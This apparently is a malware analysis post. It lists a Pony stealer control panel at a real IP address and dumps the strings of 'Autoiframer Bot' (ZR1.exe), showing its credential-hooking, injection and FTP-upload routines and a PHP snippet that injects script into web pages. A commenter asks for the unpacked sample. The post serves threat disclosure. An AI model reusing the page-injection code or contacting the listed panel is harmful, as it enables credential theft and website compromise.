95.58.254.79 (Pony hosted in Kazakhstan, Almaty, JSC Kazakhtelecom)

Pony Gate: 95.58.254.79/p/gate.php

Pony admin login: http://95.58.254.79/p/admin.php

s.exe inside the Pony package is Autoiframer Bot, Version 1.0.
Here are some strings from the sample:
File: ZR1.exe
Size: 193552 Bytes
MD5: A889A2ADAFEFF5A16AFF93DD668B763C
Packer: File not found C:\peid.exe

File Properties: CompanyName      
FileDescription  
FileVersion      
InternalName     
LegalCopyright   
OriginalFilename 
ProductName      
ProductVersion   

Exploit Signatures:
---------------------------------------------------------------------------
Scanning for 19 signatures
Scan Complete: 212Kb in 0,016 seconds
Urls
--------------------------------------------------
MiscHTTP.cpp:HTTP::DownloadString->
http://ftp://
sftp://

RegKeys
--------------------------------------------------
SOFTWARE\ZR1
>SOFTWARE\ZR1

ExeRefs
--------------------------------------------------
File: ZR1_dmp.exe_
dwm.exe
conhost.exe
dbgview.exe
taskhost.exe
csrss.exe
lsass.exe
winlogon.exe
smss.exe
svchost.exe
services.exe
ZR1.exe
Démarrage\ZR1.exe

Raw Strings:
--------------------------------------------------
File: ZR1_dmp.exe_
MD5:  a23c21b459298e70ba939155b8c194f1
Size: 217090

Ascii Strings:
---------------------------------------------------------------------------
Autoiframer Bot.cpp:wWinMain->
<Main>
SOFTWARE\ZR1
Autoiframer Bot.cpp:InfectAllProcesses->
Communication.cpp:DoRequest->
Communication.cpp:ProcessIframeCommand->
%s%s
next credential
Communication.cpp:CommandHandler->
ftp://
sftp://
Communication.cpp:DecodeFile->
Communication.cpp:ProcessUploadCommand->
Communication.cpp:SendPassword->
Communication.cpp:ProcessDownloadCommand->
Communication.cpp:ProcessCheckCommand->
CreateProcessW
GrabberCreateProcess Hook.cpp:Hook_CreateProcess->
GrabberCreateProcess Hook.cpp:DisplayInfo->
GrabberCreateProcess Hook.cpp:Hooked_CreateProcessW->
GrabberDNS.cpp:Hook_DNS->
DnsQuery_W
getaddrinfo
GetAddrInfoW
gethostbyname
GrabberDNS.cpp:Hooked_gethostbyname->
GrabberDNS.cpp:ParseADDRINFO->
%s exists
GrabberDNS.cpp:Hooked_GetAddrInfoW->
GrabberDNS.cpp:Hooked_getaddrinfo->
GrabberDNS.cpp:Hooked_DnsQuery_W->
GrabberDNS.cpp:GetDomainName->
%s not found
GrabberHook.cpp:DetourCreateInternal->
GrabberInject.cpp:Inject::CreateRemoteData->
GrabberInject.cpp:Inject::CreateThreadInRemoteProcess->
GrabberInject.cpp:Inject::Run->
GrabberInject.cpp:Inject::ProcessImport->
GrabberWinsock.cpp:HookWS2_32->
closesocket
connect
send
USER 
anonymous
PASS 
0.0.0.0
GrabberWinsock.cpp:Hooked_send->
GrabberWinsock.cpp:AddToSocketList->
&check[%i]=%i
<?php
function abc_ZR1($buffer)
$Script = <<<EOS
EOS;
// inline scripts
if(strpos($buffer, '<script') !== false)
// Find script
$Pos = strpos($buffer, '<script');
// Find start
while($buffer[$Pos] != '>') $Pos++;
$Pos += strlen('>');
// Replace
return substr($buffer, 0, $Pos) . (chr(13) . chr(10)) . $Script . substr($buffer, $Pos);
// Before </head>
if(strpos($buffer, '</head>') !== false)
$Pos = strpos($buffer, '</head>');
$Script = '<script>' . (chr(13) . chr(10)) . $Script . (chr(13) . chr(10)) . '</script>';
// Replace
return substr($buffer, 0, $Pos) . $Script . substr($buffer, $Pos);
// Lucky bastard! (Though you should think about your site layout. It's horrible. And users love scripts, really!)
return $buffer . '<!--I will be back-->';
ob_start("abc_ZR1");
u:\projects\zr1\autoiframer bot\autoiframer bot\iframer & uploader\..\Misc\WininetFTPWrapper.h:WininetFTPWrapper::Upload->
u:\projects\zr1\autoiframer bot\autoiframer bot\iframer & uploader\..\Misc\WininetFTPWrapper.h:WininetFTPWrapper::ExtendedError->
Iframer & UploaderIframer.cpp:IframeHost->
public_html
html
htdocs
forum
board
</head>
<script type="text/javascript">
</script>
%s%s
Iframer & UploaderIframer.cpp:InfectHTMLPage->
Iframer & UploaderIframer.cpp:IFramerCallback->
index.html
index.htm
index.php
default.aspx
index.cshtml
index.vbhtml
Site.master
<?php
&iframe[%s]=%i|%s/%s
&iframe[%s]=%i|%s%s%s
Iframer & UploaderUploader.cpp:UploadFileToFTP->
Iframer & UploaderUploader.cpp:UploaderCallback->
&upload[%i]=%i-%s/%s
&upload[%i]=%i-%s/%s/
Iframer & UploaderUploader.cpp:ManageUpload->
Install.cpp:UnInstall->
Install.cpp:Install->
Install.cpp:IsLegitimate->
%02X 
====
%i.%i.%i %i:%i:%i:%i
MiscDebug.cpp:DebugOutput->
MiscDebug.cpp:LogInstructions->
%08X
Err: %-2X
*** Recursive Stack Dump skipped
*** CallStack:
Fault @
 + 0x%X
 (%08LX)
Fault Occured:
*** %2d 
 + 0x%X
(%08X)
&dbg=
ACCESS VIOLATION
DATATYPE MISALIGNMENT
BREAKPOINT
SINGLE STEP
ARRAY BOUNDS EXCEEDED
FLT DENORMAL OPERAND
FLT DIVIDE BY ZERO
FLT INEXACT RESULT
FLT INVALID OPERATION
FLT OVERFLOW
FLT STACK CHECK
FLT UNDERFLOW
INT DIVIDE BY ZERO
INT OVERFLOW
PRIV INSTRUCTION
IN PAGE ERROR
ILLEGAL INSTRUCTION
NONCONTINUABLE EXCEPTION
STACK OVERFLOW
INVALID DISPOSITIO
GUARD PAGE
(unknown)
Error code %08X: %s
Time: %i.%i.%i %i:%i:%i:%i
File: %s
Bot base: %08X
Last Error: %i
Address: 
 + 0x%X
Flags: %08X
write to
exec
read from
Attempted to %s address %X
(%i)
EAX: %X
ECX: %X
EDX: %X
EBX: %X
EDI: %X
ESI: %X
EBP: %X
ESP: %X
MiscDebug.cpp:MyUnhandledExceptionFilter->
ZR1 - DEbug
MiscHTTP.cpp:HTTP::DownloadString->
MiscLinkedList.cpp:New->
MiscProcess.cpp:Is64Bit->
MiscRegistry.cpp:getValueAsDword->
Error when TiXmlDocument added to document, because TiXmlDocument can only be at the root.
Error parsing CDATA.
Error null (0) or unexpected EOF found in input stream.
Error document empty.
Error parsing Declaration.
Error parsing Comment.
Error parsing Unknown.
Error reading end tag.
Error: empty tag.
Error reading Attributes.
Error reading Element value.
Failed to read Element name
Error parsing Element.
Failed to open file
Error
No error
&apos;
&quot;
&gt;
&lt;
&amp;
8.8.8.8
Remote.cpp:InitalizeInRemoteProcess->
Remote.cpp:Hooked_TypeLoadLibrary->
LoadLibraryW
RSDSS
U:\projects\ZR1\Autoiframer Bot\Autoiframer Bot.pdb
URLDownloadToFileA
urlmon.dll
DnsQuery_A
DnsFree
DNSAPI.dll
InternetCloseHandle
InternetOpenA
InternetConnectA
FtpFindFirstFileA
InternetFindNextFileA
FtpGetCurrentDirectoryA
FtpSetCurrentDirectoryA
FtpOpenFileA
InternetWriteFile
FtpGetFileSize
InternetReadFile
InternetGetLastResponseInfoW
FtpCreateDirectoryA
InternetConnectW
HttpOpenRequestW
HttpSendRequestA
WININET.dll
PathStripPathA
PathRemoveExtensionA
PathAppendA
PathAppendW
StrStrIW
SHLWAPI.dll
WSAAddressToStringA
WS2_32.dll
GetLastError
lstrlenW
HeapAlloc
GetProcessHeap
SetUnhandledExceptionFilter
GetModuleFileNameW
GetModuleHandleW
CreateThread
Sleep
GetCurrentProcessId
CreateToolhelp32Snapshot
Process32FirstW
CloseHandle
lstrcmpW
WaitForSingleObject
Process32NextW
LoadLibraryW
HeapFree
VirtualFree
HeapReAlloc
GetModuleFileNameA
GetTempPathA
GetTickCount
CreateProcessA
ResumeThread
WideCharToMultiByte
GetProcAddress
VirtualAlloc
VirtualProtect
DeleteFileW
CreateFileW
GetFileSize
ReadFile
WriteFile
lstrcpyW
CreateProcessW
OutputDebugStringA
GetTempPathW
lstrcatW
OutputDebugStringW
SetFilePointer
GetSystemTime
VirtualQuery
LocalAlloc
MultiByteToWideChar
KERNEL32.dll
wsprintfW
wsprintfA
USER32.dll
RegDeleteKeyW
RegOpenKeyExA
RegQueryValueExA
RegCloseKey
RegCreateKeyExW
RegSetValueExW
ADVAPI32.dll
SHGetFolderPathW
SHELL32.dll
DecodePointer
EncodePointer
GetCommandLineW
HeapSetInformation
GetStartupInfoW
ExitProcess
GetStdHandle
HeapCreate
UnhandledExceptionFilter
IsDebuggerPresent
TerminateProcess
GetCurrentProcess
GetCPInfo
InterlockedIncrement
InterlockedDecrement
GetACP
GetOEMCP
IsValidCodePage
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
SetLastError
GetCurrentThreadId
LCMapStringW
IsProcessorFeaturePresent
EnterCriticalSection
LeaveCriticalSection
InitializeCriticalSectionAndSpinCount
RtlUnwind
SetHandleCount
GetFileType
DeleteCriticalSection
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
GetSystemTimeAsFileTime
GetConsoleCP
GetConsoleMode
GetStringTypeW
HeapSize
SetStdHandle
WriteConsoleW
FlushFileBuffers
                          
Content-Type: application/x-www-form-urlencoded
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>

Unicode Strings:
---------------------------------------------------------------------------
%s: x%x
%s: %i
Install
Installed
Die reverser die
Process32First
dwm.exe
conhost.exe
dbgview.exe
taskhost.exe
csrss.exe
lsass.exe
winlogon.exe
smss.exe
svchost.exe
services.exe
NT_ERROR(xNtOpenProcess(...))
wininet.dll
http://
%s%s%s
heapallc
|heapalloc 2
strstr()
credentials done
files done
NumberOfFTPAccounts
Port
Uninstall
CreateProcess
Yipiee kay yeah motherfuckr
kernel32.dll
No process hook for me
Create suspended
Own _gRemoteData
Own Base
success
Entered
Dnsapi
Dnsapi.dll
Original_DnsQuery_W
!Original_DnsQuery_W
Ws2_32
oWs2_32.dll
Original_getaddrinfo
!Original_getaddrinfo
Original_GetAddrInfoW
!Original_GetAddrInfoW
numberOfResults
>numberOfIPs
>curr
Trampoline
>xNtAllocateVirtualMemory
remoteStruct
Write path
Cannot write remotedata
? !currentPE
SizeOfImage
allocate temp space to reloc
copy bot to temp space
alloc in remote process
New Base
Rebase/Import
tempCopyPEHeader->OptionalHeader.SizeOfImage
dwWritten
Difference
VPEx
Nothing to start?
No Imports
I think I can steal from you and just walk away.
0YEEAAH
WHAAAT?
FtpOpenFile
Write failed
Couldn't connect or logn
upload
Is domain
@ASPX
HTML
Is file
backup dir
change to DirectoryFound
Couldn't create
Couldn't change to
Deleting Botfile
>SOFTWARE\ZR1
Deleting registry info
<MAIN>
No reg
ZR1.exe
CreateFile
Done
Wrong encryptionkey
Modified
Wron path
debug Dec 24 2012.txt
temp?
InstructionsToDissassemble
StartFaultAddress
ASLR is no problem in that case. Or is it?
gPOST
dwBytesAvailable
Download - HeapAlloc - BytesAvailable
Download - HeapAlloc - GetLastError()
dwBytesRead
alloc list elem
Fail
value
ws2_32.dll
C:\Documents and Settings\xxx\Menu Démarrer\Programmes\Démarrage\ZR1.exe
&File
iE&xit
&Help
h&About ...
About Autoiframer Bot
MS Shell Dlg
Autoiframer Bot, Version 1.0
Copyright (C) 2012
Autoiframer Bot
AUTOIFRAMERBOT
The message for reversers:
Die reverser die

Hosting info:
http://whois.domaintools.com/95.58.254.79


1 Comment

Anonymous - December 28, 2012 at 5:04 am

Can you send me the unpacked iframer? Seems interesting, but I can't seem to get it to infect. ty pig
